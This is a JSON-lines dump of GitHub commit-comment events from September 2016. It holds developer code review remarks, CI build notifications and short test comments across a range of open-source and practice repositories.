{"id":"4589089852","type":"CommitCommentEvent","actor":{"login":"jaanieh"},"repo":{"name":"jaanieh/practicegit"},"payload":{"comment":{"id":19094666,"position":null,"line":null,"path":null,"commit_id":"f02bbbc795532f22894a0ba1777ee85da4e60ec8","created_at":"2016-09-20T11:39:29Z","updated_at":"2016-09-20T11:39:29Z","body":"mergeonline"}},"created_at":"2016-09-20T11:39:29Z"}
{"id":"4589091356","type":"CommitCommentEvent","actor":{"login":"zdravkokarabenchev"},"repo":{"name":"zdravkokarabenchev/repo-test2"},"payload":{"comment":{"id":19094669,"position":null,"line":null,"path":null,"commit_id":"ba1e8be618a1765f8792e6e1393383630587fd57","created_at":"2016-09-20T11:39:48Z","updated_at":"2016-09-20T11:39:48Z","body":"ehooo"}},"created_at":"2016-09-20T11:39:48Z"}
{"id":"4589094744","type":"CommitCommentEvent","actor":{"login":"NagarjunSaragadam"},"repo":{"name":"NagarjunSaragadam/KPCLMOBILE"},"payload":{"comment":{"id":19094677,"position":null,"line":null,"path":null,"commit_id":"d74f23e4b735bac032d6b9b538859e337754c7d5","created_at":"2016-09-20T11:40:36Z","updated_at":"2016-09-20T11:40:36Z","body":"done"}},"created_at":"2016-09-20T11:40:36Z"}
{"id":"4589095116","type":"CommitCommentEvent","actor":{"login":"davecom"},"repo":{"name":"vsouza/awesome-ios"},"payload":{"comment":{"id":19094678,"position":null,"line":null,"path":null,"commit_id":"94f8f7df5b8a1320581dffd4b6b553785849d290","created_at":"2016-09-20T11:40:40Z","updated_at":"2016-09-20T11:40:40Z","body":"@lfarah  Thanks!"}},"created_at":"2016-09-20T11:40:40Z"}
{"id":"4589096009","type":"CommitCommentEvent","actor":{"login":"blambov"},"repo":{"name":"mkjellman/cassandra"},"payload":{"comment":{"id":19094682,"position":74,"line":225,"path":"src/java/org/apache/cassandra/io/sstable/SSTableScanner.java","commit_id":"e5389378b19eb03de7dd4d50d6df110c68057985","created_at":"2016-09-20T11:40:53Z","updated_at":"2016-09-20T11:40:53Z","body":"Is this necessary? Iterators use `hasNext` to indicate the end."}},"created_at":"2016-09-20T11:40:53Z"}
{"id":"4589097616","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19094684,"position":30,"line":49,"path":"src/raft.cpp","commit_id":"ceff626d8774a0449a99000674fe3609d7199e9a","created_at":"2016-09-20T11:41:14Z","updated_at":"2016-09-20T11:41:14Z","body":"These three could be made constant."}},"created_at":"2016-09-20T11:41:14Z"}
{"id":"4589098641","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19094690,"position":null,"line":null,"path":null,"commit_id":"12fd32ea9498883f6229174d5d91e81671fae51c","created_at":"2016-09-20T11:41:28Z","updated_at":"2016-09-20T11:41:28Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1059](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13602&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T11:41:28Z"}
{"id":"4589098900","type":"CommitCommentEvent","actor":{"login":"dimitrow97"},"repo":{"name":"dimitrow97/arebe"},"payload":{"comment":{"id":19094693,"position":null,"line":null,"path":null,"commit_id":"9fddaf0345ad864294875bea73961f13af8078ab","created_at":"2016-09-20T11:41:31Z","updated_at":"2016-09-20T11:41:31Z","body":"jjjjjjj"}},"created_at":"2016-09-20T11:41:31Z"}
{"id":"4589102655","type":"CommitCommentEvent","actor":{"login":"Rossalinda"},"repo":{"name":"Rossalinda/exercise-repo"},"payload":{"comment":{"id":19094702,"position":null,"line":null,"path":null,"commit_id":"6f08cbbcfb61818bf39dc26b79e9ef6875875409","created_at":"2016-09-20T11:42:22Z","updated_at":"2016-09-20T11:42:22Z","body":"first exersice"}},"created_at":"2016-09-20T11:42:22Z"}
{"id":"4589102927","type":"CommitCommentEvent","actor":{"login":"nimasmi"},"repo":{"name":"torchbox/wagtail-torchbox"},"payload":{"comment":{"id":19094703,"position":null,"line":null,"path":null,"commit_id":"1008887ec619b6439b7e863c11a0208afd3f8028","created_at":"2016-09-20T11:42:26Z","updated_at":"2016-09-20T11:42:26Z","body":"As ajax-load.js isn't being used anywhere now, can it be removed completely?"}},"created_at":"2016-09-20T11:42:26Z"}
{"id":"4589103159","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/Products.Archetypes"},"payload":{"comment":{"id":19094704,"position":null,"line":null,"path":null,"commit_id":"ea2303f3b98ffbc6f68b6cdbe5dc87e3b4c15e8d","created_at":"2016-09-20T11:42:30Z","updated_at":"2016-09-20T11:42:30Z","body":"Thomas Schorr your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-20T11:42:30Z"}
{"id":"4589103938","type":"CommitCommentEvent","actor":{"login":"quozl"},"repo":{"name":"quozl/cforth-1"},"payload":{"comment":{"id":19094706,"position":null,"line":null,"path":null,"commit_id":"9d3d888af88428ed460c5dd217f6a8dbf5c57a1e","created_at":"2016-09-20T11:42:41Z","updated_at":"2016-09-20T11:42:41Z","body":"I'm fairly confident that I'm leaking `pcb`'s and it may be that `memp_free` needs to be called for TIME_WAIT, FIN_WAIT_2, and LAST_ACK connections, as done in `espconn_kill_oldest`."}},"created_at":"2016-09-20T11:42:41Z"}
{"id":"4589110553","type":"CommitCommentEvent","actor":{"login":"SaraSoueidan"},"repo":{"name":"filamentgroup/tablesaw"},"payload":{"comment":{"id":19094718,"position":null,"line":null,"path":null,"commit_id":"f82ecaab892782c9f3eb7df50e94e2616ebdc527","created_at":"2016-09-20T11:44:11Z","updated_at":"2016-09-20T11:44:11Z","body":"Fantastic! It works now!! 🎉 Thank you Zach!"}},"created_at":"2016-09-20T11:44:11Z"}
{"id":"4589115674","type":"CommitCommentEvent","actor":{"login":"silasdavis"},"repo":{"name":"eris-ltd/eris-db"},"payload":{"comment":{"id":19094728,"position":null,"line":null,"path":null,"commit_id":"62a8d74487b34ab968346d40cbd8406697a6ed5c","created_at":"2016-09-20T11:45:21Z","updated_at":"2016-09-20T11:45:21Z","body":"Do we want this change in develop @VoR0220 @benjaminbollen "}},"created_at":"2016-09-20T11:45:21Z"}
{"id":"4589116332","type":"CommitCommentEvent","actor":{"login":"torognes"},"repo":{"name":"torognes/vsearch"},"payload":{"comment":{"id":19094730,"position":null,"line":null,"path":null,"commit_id":"dcf0d4f4b1403e904f467580fc86d2a249304f7d","created_at":"2016-09-20T11:45:31Z","updated_at":"2016-09-20T11:45:31Z","body":"I think it is a good idea. Since there are so many options it would be nice to get some more structure. It might be difficult to decide which category some of the options belong to  (e.g. does `fastq_ascii` belong to `Input` or `Parameters`), but in most cases it should be clear."}},"created_at":"2016-09-20T11:45:31Z"}
{"id":"4589117555","type":"CommitCommentEvent","actor":{"login":"blambov"},"repo":{"name":"mkjellman/cassandra"},"payload":{"comment":{"id":19094733,"position":88,"line":244,"path":"src/java/org/apache/cassandra/io/sstable/SSTableScanner.java","commit_id":"e5389378b19eb03de7dd4d50d6df110c68057985","created_at":"2016-09-20T11:45:46Z","updated_at":"2016-09-20T11:45:46Z","body":"Deserialzied -> Deserialized"}},"created_at":"2016-09-20T11:45:46Z"}
{"id":"4589117788","type":"CommitCommentEvent","actor":{"login":"madmoose"},"repo":{"name":"peterkohaut/scummvm"},"payload":{"comment":{"id":19094734,"position":18,"line":65,"path":"engines/bladerunner/view.cpp","commit_id":"6ecd44bb49bf9a6fc507be0f0918411784e60a53","created_at":"2016-09-20T11:45:50Z","updated_at":"2016-09-20T11:45:50Z","body":"My beautiful alignment :-("}},"created_at":"2016-09-20T11:45:50Z"}
{"id":"4589118149","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/Products.Archetypes"},"payload":{"comment":{"id":19094735,"position":null,"line":null,"path":null,"commit_id":"1f638f9e85d956aaf45e91fb1452f517cb0f9eb5","created_at":"2016-09-20T11:45:55Z","updated_at":"2016-09-20T11:45:55Z","body":"Thomas Schorr your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-20T11:45:55Z"}
{"id":"4589118388","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19094736,"position":null,"line":null,"path":null,"commit_id":"6f40719297a4d9405aa0e087754ef62cfab5a38c","created_at":"2016-09-20T11:45:58Z","updated_at":"2016-09-20T11:45:58Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1060](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13605&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T11:45:58Z"}
{"id":"4589118677","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19094737,"position":30,"line":49,"path":"src/raft.cpp","commit_id":"ceff626d8774a0449a99000674fe3609d7199e9a","created_at":"2016-09-20T11:46:03Z","updated_at":"2016-09-20T11:46:03Z","body":"Airgap isn't always rounded to nearest layer height, is it?"}},"created_at":"2016-09-20T11:46:03Z"}
{"id":"4589128412","type":"CommitCommentEvent","actor":{"login":"rstoyanchev"},"repo":{"name":"sdeleuze/spring-framework"},"payload":{"comment":{"id":19094768,"position":79,"line":77,"path":"spring-web/src/main/java/org/springframework/http/codec/AbstractServerHttpMessageWriter.java","commit_id":"b17f596f60fac7af458e6cf5b3cfcb911d0c3744","created_at":"2016-09-20T11:48:16Z","updated_at":"2016-09-20T11:48:16Z","body":"Good point. Maybe we should not pass the response then? You can still override the entire write and if you're writing to the response then you probably won't delegate either."}},"created_at":"2016-09-20T11:48:16Z"}
{"id":"4589128997","type":"CommitCommentEvent","actor":{"login":"mjpt777"},"repo":{"name":"real-logic/Agrona"},"payload":{"comment":{"id":19094772,"position":18,"line":104,"path":"src/main/java/org/agrona/collections/CollectionUtil.java","commit_id":"9549fa355f63f627496ebc60de476bfbf883c09a","created_at":"2016-09-20T11:48:23Z","updated_at":"2016-09-20T11:48:23Z","body":"This may be simpler with a reverse loop."}},"created_at":"2016-09-20T11:48:23Z"}
{"id":"4589130808","type":"CommitCommentEvent","actor":{"login":"PERA88050403"},"repo":{"name":"antoinepaul/antoinepaul"},"payload":{"comment":{"id":19094775,"position":null,"line":null,"path":null,"commit_id":"403bf2203e41faba7c930f75a44f6be7cb943ed2","created_at":"2016-09-20T11:48:49Z","updated_at":"2016-09-20T11:48:49Z","body":"Que 15 minute"}},"created_at":"2016-09-20T11:48:49Z"}
{"id":"4589131046","type":"CommitCommentEvent","actor":{"login":"sunnivmr"},"repo":{"name":"lefso/Vinyl"},"payload":{"comment":{"id":19094776,"position":3,"line":1,"path":"README.md","commit_id":"96ddee427821d8b88ba5e7102848eef87917aece","created_at":"2016-09-20T11:48:52Z","updated_at":"2016-09-20T11:48:52Z","body":"heihei"}},"created_at":"2016-09-20T11:48:52Z"}
{"id":"4589132021","type":"CommitCommentEvent","actor":{"login":"sunnivmr"},"repo":{"name":"lefso/Vinyl"},"payload":{"comment":{"id":19094779,"position":1,"line":1,"path":"README.md","commit_id":"96ddee427821d8b88ba5e7102848eef87917aece","created_at":"2016-09-20T11:49:06Z","updated_at":"2016-09-20T11:49:06Z","body":"lol"}},"created_at":"2016-09-20T11:49:06Z"}
{"id":"4589137638","type":"CommitCommentEvent","actor":{"login":"juiced"},"repo":{"name":"BelledonneCommunications/linphone-iphone"},"payload":{"comment":{"id":19094795,"position":null,"line":null,"path":null,"commit_id":"5a785b7b9d41b0ede7d29ba4fcdbd21441d75d0b","created_at":"2016-09-20T11:50:21Z","updated_at":"2016-09-20T11:50:21Z","body":"@sakieltang What doesn't work? Can you give more info? Maybe I can help, as I'm trying to get the latest code to run on iOS 10 with Xcode8 too. For me it only crashes on the phone now as soon as I'm having contacts in my contactbook."}},"created_at":"2016-09-20T11:50:21Z"}
{"id":"4589139685","type":"CommitCommentEvent","actor":{"login":"csocquet"},"repo":{"name":"csocquet/LiquibaseBundle"},"payload":{"comment":{"id":19094801,"position":null,"line":null,"path":null,"commit_id":"b9988acdadb4c8e4db845fc094f4b270c399b494","created_at":"2016-09-20T11:50:49Z","updated_at":"2016-09-20T11:50:49Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;9x7LueZ3&#x2F;1-ajouter-la-commande-liquibase-version\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Ajouter la commande liquibase:version</a>"}},"created_at":"2016-09-20T11:50:49Z"}
{"id":"4589140649","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":19094806,"position":null,"line":null,"path":null,"commit_id":"5e7c6616171106867f7fdf52ef1526e0c3dcb6e6","created_at":"2016-09-20T11:51:02Z","updated_at":"2016-09-20T11:51:02Z","body":"This will only regress the find in files part (which actually makes no sense, since the user wouldn't know what to look for anyway).\r\n\r\nThey'll still be picked up by the searchbar via the typesystem."}},"created_at":"2016-09-20T11:51:02Z"}
{"id":"4589143640","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19094813,"position":19,"line":544,"path":"src/FffPolygonGenerator.cpp","commit_id":"9ba3e301d615e0c42fb6bbed8a2c4771341850c4","created_at":"2016-09-20T11:51:41Z","updated_at":"2016-09-20T11:51:41Z","body":"An angle of 89 is already an allowed_angle_offset of 5.7cm!\r\nAt some point between 89 and 90 we'll start hitting overflow errors. I don't really care enough to figure out at what degree _exactly_ that will be."}},"created_at":"2016-09-20T11:51:41Z"}
{"id":"4589147564","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19094820,"position":null,"line":null,"path":null,"commit_id":"056b267146b2368e483ebbe2caadd52fff6c1aa5","created_at":"2016-09-20T11:52:34Z","updated_at":"2016-09-20T11:52:34Z","body":"develop (macumber) - i386-Windows-7-VisualStudio-12: OK (2403 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-056b267146b2368e483ebbe2caadd52fff6c1aa5-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-056b267146b2368e483ebbe2caadd52fff6c1aa5-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.16%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T11:52:34Z"}
{"id":"4589149179","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19094833,"position":null,"line":null,"path":null,"commit_id":"12fd32ea9498883f6229174d5d91e81671fae51c","created_at":"2016-09-20T11:52:56Z","updated_at":"2016-09-20T11:52:56Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1059](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13602&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:11:28"}},"created_at":"2016-09-20T11:52:56Z"}
{"id":"4589149680","type":"CommitCommentEvent","actor":{"login":"ruslangaripov"},"repo":{"name":"Serg-Norseman/CalendarConverter"},"payload":{"comment":{"id":19094837,"position":21,"line":220,"path":"CalendarConverterTests/UDNTests.cs","commit_id":"c27427ae830add3b739f7cfba1986a20f69e9a52","created_at":"2016-09-20T11:53:03Z","updated_at":"2016-09-20T11:53:03Z","body":"Current implementation of the 3rd version of conversion functions for the Gregorian calendar uses stuff from the first section (see http://aa.quae.nl/en/reken/juliaansedag.html). It really has a limitation: it does fail on dates before 1 March, -4700. The algorithm requires an additional stepping to be injected into the formula in order to fix the bug.\r\n\r\nI'll try to implement another two algorithms from http://aa.quae.nl/en/reken/juliaansedag.html.\r\n\r\nAs a workaround (or permanent solution?): try to use `gregorian_to_jd2` and `jd_to_gregorian2` functions. They are our implementation of JDN-to-Gregorian conversion based on the [Wikipedia] (https://en.m.wikipedia.org/wiki/Julian_day). It looks like those function handles tests well, doesn't?"}},"created_at":"2016-09-20T11:53:03Z"}
{"id":"4589151794","type":"CommitCommentEvent","actor":{"login":"mattheworiordan"},"repo":{"name":"ably/ably-ios"},"payload":{"comment":{"id":19094843,"position":null,"line":null,"path":null,"commit_id":"81033b8c225f1161531aa4e8c0710c47af76b7cc","created_at":"2016-09-20T11:53:32Z","updated_at":"2016-09-20T11:53:32Z","body":"👍 "}},"created_at":"2016-09-20T11:53:32Z"}
{"id":"4589152020","type":"CommitCommentEvent","actor":{"login":"cnt1992"},"repo":{"name":"ggstudy-ddup/es6"},"payload":{"comment":{"id":19094844,"position":59,"line":56,"path":"task1_calendar/src/index.js","commit_id":"7697bb55563ab7b2d446925ae245f0c104b25cbe","created_at":"2016-09-20T11:53:35Z","updated_at":"2016-09-20T11:53:35Z","body":"跟DOM插入相关的操作，建议先缓存起来，等最终一次性渲染出来，不然太多DOM插入对性能不好。这里建议改成："}},"created_at":"2016-09-20T11:53:35Z"}
{"id":"4589156181","type":"CommitCommentEvent","actor":{"login":"JaydonRan"},"repo":{"name":"JaydonRan/Album"},"payload":{"comment":{"id":19094850,"position":null,"line":null,"path":null,"commit_id":"31e9d6fffb83f862a69a6c39d3a59ccda2557c7d","created_at":"2016-09-20T11:54:34Z","updated_at":"2016-09-20T11:54:34Z","body":"这是一个像Windows的资源管理器一样的 PHP web后台图片管理器，稍加修改就是可以向Windows的资源管理器一样，当web的资源管理器用。"}},"created_at":"2016-09-20T11:54:34Z"}
{"id":"4589157346","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19094852,"position":7,"line":79,"path":"src/FffGcodeWriter.cpp","commit_id":"a70fdfb9171a66ca249bb1857b4682078392dc04","created_at":"2016-09-20T11:54:49Z","updated_at":"2016-09-20T11:54:49Z","body":"Are you sure this doesn't generate support between the model and the raft?"}},"created_at":"2016-09-20T11:54:49Z"}
{"id":"4589157364","type":"CommitCommentEvent","actor":{"login":"vbarhatov"},"repo":{"name":"ibarhatov/HelloWorld"},"payload":{"comment":{"id":19094853,"position":21,"line":29,"path":"HelloWorld/src/com/company/Main.java","commit_id":"c93724db6004bb05aff9bec219cea64a944fb3e7","created_at":"2016-09-20T11:54:50Z","updated_at":"2016-09-20T11:54:50Z","body":"`for (Person s: stars.size())`"}},"created_at":"2016-09-20T11:54:50Z"}
{"id":"4589160474","type":"CommitCommentEvent","actor":{"login":"apals"},"repo":{"name":"cloudloop/dpy"},"payload":{"comment":{"id":19094857,"position":null,"line":null,"path":null,"commit_id":"b33127410a69124b064d8aebd246f56234811d15","created_at":"2016-09-20T11:55:30Z","updated_at":"2016-09-20T11:55:30Z","body":"najs"}},"created_at":"2016-09-20T11:55:30Z"}
{"id":"4589161016","type":"CommitCommentEvent","actor":{"login":"vbarhatov"},"repo":{"name":"ibarhatov/HelloWorld"},"payload":{"comment":{"id":19094858,"position":17,"line":28,"path":"HelloWorld/src/com/company/Main.java","commit_id":"c93724db6004bb05aff9bec219cea64a944fb3e7","created_at":"2016-09-20T11:55:37Z","updated_at":"2016-09-20T11:55:37Z","body":"`Person similarStar ;`"}},"created_at":"2016-09-20T11:55:37Z"}
{"id":"4589161057","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19094859,"position":null,"line":null,"path":null,"commit_id":"6f40719297a4d9405aa0e087754ef62cfab5a38c","created_at":"2016-09-20T11:55:38Z","updated_at":"2016-09-20T11:55:38Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1060](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13605&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 239, ignored: 3 Build time: 00:09:40"}},"created_at":"2016-09-20T11:55:38Z"}
{"id":"4589162246","type":"CommitCommentEvent","actor":{"login":"vbarhatov"},"repo":{"name":"ibarhatov/HelloWorld"},"payload":{"comment":{"id":19094865,"position":24,"line":32,"path":"HelloWorld/src/com/company/Main.java","commit_id":"c93724db6004bb05aff9bec219cea64a944fb3e7","created_at":"2016-09-20T11:55:54Z","updated_at":"2016-09-20T11:55:54Z","body":"`similarStar = s`"}},"created_at":"2016-09-20T11:55:54Z"}
{"id":"4589163182","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19094868,"position":null,"line":null,"path":null,"commit_id":"79250a12e5d15a819c61b0335db93fb2aad86182","created_at":"2016-09-20T11:56:07Z","updated_at":"2016-09-20T11:56:07Z","body":"This is still wrong. You've deleted the else clause"}},"created_at":"2016-09-20T11:56:07Z"}
{"id":"4589164727","type":"CommitCommentEvent","actor":{"login":"positively"},"repo":{"name":"DrKLO/Telegram"},"payload":{"comment":{"id":19094873,"position":null,"line":null,"path":null,"commit_id":"4f9384afee0cf8e3e6c981f3242534f8d3e932e8","created_at":"2016-09-20T11:56:26Z","updated_at":"2016-09-20T11:56:26Z","body":"What a price for this major fix?) Who knows?)"}},"created_at":"2016-09-20T11:56:26Z"}
{"id":"4589165001","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19094874,"position":60,"line":361,"path":"src/FffGcodeWriter.cpp","commit_id":"a70fdfb9171a66ca249bb1857b4682078392dc04","created_at":"2016-09-20T11:56:29Z","updated_at":"2016-09-20T11:56:29Z","body":"Where'd the +2 arise from? Document that?\r\n(Yes, I see the removed line 291, but it's not documented there either.)"}},"created_at":"2016-09-20T11:56:29Z"}
{"id":"4589167210","type":"CommitCommentEvent","actor":{"login":"TheCyberBrick"},"repo":{"name":"Angry-Pixel/The-Betweenlands"},"payload":{"comment":{"id":19094877,"position":null,"line":null,"path":null,"commit_id":"a3f5d71b15d3fbf2e4c7f252ded4c25b4acdfc2a","created_at":"2016-09-20T11:56:59Z","updated_at":"2016-09-20T11:56:59Z","body":"Oops, forgot to add the shader check"}},"created_at":"2016-09-20T11:56:59Z"}
{"id":"4589168871","type":"CommitCommentEvent","actor":{"login":"jnkyacc"},"repo":{"name":"skyarkhangel/Hardcore-SK"},"payload":{"comment":{"id":19094881,"position":null,"line":null,"path":null,"commit_id":"4a6a4374fc5f8edd07750c384e569013024c49e6","created_at":"2016-09-20T11:57:19Z","updated_at":"2016-09-20T11:57:19Z","body":"https://en.wikipedia.org/wiki/GAU-8_Avenger ..."}},"created_at":"2016-09-20T11:57:19Z"}
{"id":"4589177702","type":"CommitCommentEvent","actor":{"login":"VoR0220"},"repo":{"name":"eris-ltd/eris-db"},"payload":{"comment":{"id":19094895,"position":null,"line":null,"path":null,"commit_id":"62a8d74487b34ab968346d40cbd8406697a6ed5c","created_at":"2016-09-20T11:59:15Z","updated_at":"2016-09-20T11:59:15Z","body":"Yes"}},"created_at":"2016-09-20T11:59:15Z"}
{"id":"4589182087","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19094904,"position":null,"line":null,"path":null,"commit_id":"e6372efd05472ce9051b34516a2de0d99b1a22da","created_at":"2016-09-20T12:00:13Z","updated_at":"2016-09-20T12:00:13Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 59](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13610&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-20T12:00:13Z"}
{"id":"4589183622","type":"CommitCommentEvent","actor":{"login":"coopersimon"},"repo":{"name":"coopersimon/PSXEmu"},"payload":{"comment":{"id":19094908,"position":null,"line":null,"path":null,"commit_id":"48553bc3cfd3e7cb9e76e47d2ec039e06f58014a","created_at":"2016-09-20T12:00:30Z","updated_at":"2016-09-20T12:00:30Z","body":"It's hard to give a %, of the core code maybe 25%-30% is done, but we then need to do a hell of a lot of testing."}},"created_at":"2016-09-20T12:00:30Z"}
{"id":"4589184257","type":"CommitCommentEvent","actor":{"login":"Justinzobel"},"repo":{"name":"solus-project/3rd-party"},"payload":{"comment":{"id":19094911,"position":null,"line":null,"path":null,"commit_id":"7bfa8c43c021766618dc7bd8ff506af54858d19d","created_at":"2016-09-20T12:00:40Z","updated_at":"2016-09-20T12:00:40Z","body":"Might be better putting the .desktop file in files/ so it's visible in our repo and \"local\"."}},"created_at":"2016-09-20T12:00:40Z"}
{"id":"4589185280","type":"CommitCommentEvent","actor":{"login":"sinith"},"repo":{"name":"sinith/sinthhub"},"payload":{"comment":{"id":19094914,"position":null,"line":null,"path":null,"commit_id":"b41b326a38eb64bf92cd4bd0b3b1b5545fa6d189","created_at":"2016-09-20T12:00:54Z","updated_at":"2016-09-20T12:00:54Z","body":"no change"}},"created_at":"2016-09-20T12:00:54Z"}
{"id":"4589187796","type":"CommitCommentEvent","actor":{"login":"MrTJP"},"repo":{"name":"TheCBProject/CodeChickenLib"},"payload":{"comment":{"id":19094918,"position":null,"line":null,"path":null,"commit_id":"b1341d3ae9b5b0825ca90168151b589a883986fd","created_at":"2016-09-20T12:01:24Z","updated_at":"2016-09-20T12:01:24Z","body":"Looks good, except for the mix lookup. If a and b was switched, it wouldn't match. \n\n> On Sep 20, 2016, at 7:31 AM, covers1624 <notifications@github.com> wrote:\n> \n> Basic EnumColour stuff. @MrTJP Good?\n> \n> -- \n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/TheCBProject/CodeChickenLib/commit/b1341d3ae9b5b0825ca90168151b589a883986fd\n"}},"created_at":"2016-09-20T12:01:24Z"}
{"id":"4589188132","type":"CommitCommentEvent","actor":{"login":"STudio26"},"repo":{"name":"STudio26/hello-world"},"payload":{"comment":{"id":19094919,"position":null,"line":null,"path":null,"commit_id":"d1e9a5d2145d72087c1763926a74cd428cad5d46","created_at":"2016-09-20T12:01:28Z","updated_at":"2016-09-20T12:01:28Z","body":"Direct commit in master"}},"created_at":"2016-09-20T12:01:28Z"}
{"id":"4589188169","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19094920,"position":null,"line":null,"path":null,"commit_id":"e6372efd05472ce9051b34516a2de0d99b1a22da","created_at":"2016-09-20T12:01:29Z","updated_at":"2016-09-20T12:01:29Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 59](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13610&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:15"}},"created_at":"2016-09-20T12:01:29Z"}
{"id":"4589188977","type":"CommitCommentEvent","actor":{"login":"cnt1992"},"repo":{"name":"ggstudy-ddup/es6"},"payload":{"comment":{"id":19094923,"position":257,"line":297,"path":"task1_calendar/src/index.js","commit_id":"c5c417cadcc1b452adb6c7fa39a7bcb882159193","created_at":"2016-09-20T12:01:39Z","updated_at":"2016-09-20T12:01:39Z","body":"这里的鼠标滚动事件交互应该为：当鼠标往下滚（一次内不论滚多少都应该只触发一次）。现在这样鼠标一次一直往下滚就不断切换了。建议改成：增加一个节流函数，控制多少时间内的滚动都只算一次。"}},"created_at":"2016-09-20T12:01:39Z"}
{"id":"4589192186","type":"CommitCommentEvent","actor":{"login":"luisff2016"},"repo":{"name":"luisff2016/REPOSITORIO"},"payload":{"comment":{"id":19094934,"position":23,"line":30,"path":"main.c","commit_id":"11fc9bf13ea338ac0a9c29c6fafd97ce62cc6a23","created_at":"2016-09-20T12:02:23Z","updated_at":"2016-09-20T12:02:23Z","body":"comentario"}},"created_at":"2016-09-20T12:02:23Z"}
{"id":"4589195094","type":"CommitCommentEvent","actor":{"login":"aymericdamiensc"},"repo":{"name":"tflearn/tflearn"},"payload":{"comment":{"id":19094938,"position":null,"line":null,"path":null,"commit_id":"3c025bee4e31226b6c2fd650b8c2338a38fc9e53","created_at":"2016-09-20T12:03:01Z","updated_at":"2016-09-20T12:03:01Z","body":"ops... that is correct, let me remove that part. It should not be mandatory to have target data indeed.."}},"created_at":"2016-09-20T12:03:01Z"}
{"id":"4589195588","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/XMLTV-Import"},"payload":{"comment":{"id":19094940,"position":null,"line":null,"path":null,"commit_id":"88ca59a3aa3857a3c950fcf2d193d319869a9db8","created_at":"2016-09-20T12:03:09Z","updated_at":"2016-09-20T12:03:09Z","body":"yeah, try ... except will catch that one too."}},"created_at":"2016-09-20T12:03:09Z"}
